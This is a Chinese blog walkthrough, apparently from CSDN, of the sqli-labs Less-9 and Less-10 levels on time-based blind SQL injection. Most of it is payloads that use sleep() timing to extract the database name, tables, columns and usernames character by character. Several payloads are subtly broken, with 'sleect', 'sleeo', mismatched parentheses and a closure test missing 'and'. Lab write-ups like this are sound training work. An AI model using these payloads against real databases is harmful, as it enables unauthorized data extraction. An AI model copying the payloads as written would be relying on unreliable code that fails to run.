这两关是时间盲注
Less-9(GET - Bilnd - Time based -String Quotes)
手工注入
这里使用sleep()函数
闭合方式还是跳过
?id=1' 1=1 --+
爆破数据库
?id=1' and if(ascii(substr(database(),1,1))=1,1,sleep(5)) --+
使用burp抓包
直接爆破就可以这里就省略了不会的看看第七把关
循环就可以
猜测数据表
由于后面一样就只写payload了
?id=1' and if(ascii(substr((sleect table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=1,1,sleep(5)) --+
猜测列
?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='user' limit 0,1),1,1))=1,1,sleep(5)) --+
猜测数据
?id=1' and if(ascii(substr((select username from users limit 0,1),1,1))=1,1,sleep(5)) --+
自动化注入
与之前一样
(3条消息) sqli-labs第一二关_himobrinehacken的博客-CSDN博客
Less-10(GET - Bilnd - Time based -double quotes)
手工注入
和上一关差不多就是单引号变成了双引号
简单写个payload吧
?id=1" and if(ascii(substr(database(),1,1),1,1))=1,1,sleeo(5)) --+
自动化注入
和之前一样
(3条消息) sqli-labs第一二关_himobrinehacken的博客-CSDN博客